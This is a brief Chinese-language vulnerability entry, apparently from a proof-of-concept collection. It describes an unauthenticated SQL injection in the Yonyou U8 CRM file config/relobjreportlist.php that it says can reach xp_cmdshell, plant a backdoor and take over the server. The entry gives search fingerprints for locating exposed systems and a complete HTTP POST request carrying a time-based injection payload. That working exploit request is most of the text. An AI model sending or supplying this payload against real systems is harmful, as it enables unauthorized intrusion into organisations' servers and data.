用友U8 CRM 客户关系管理系统 config/relobjreportlist.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
title="用友U8CRM"app.name="用友 CRM"POST /config/relobjreportlist.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=bgsesstimeout-;
DontCheckLogin=1&Action=CheckRelUser&typeID=1&objType=1&ids=1');WAITFOR DELAY '0:0:5'--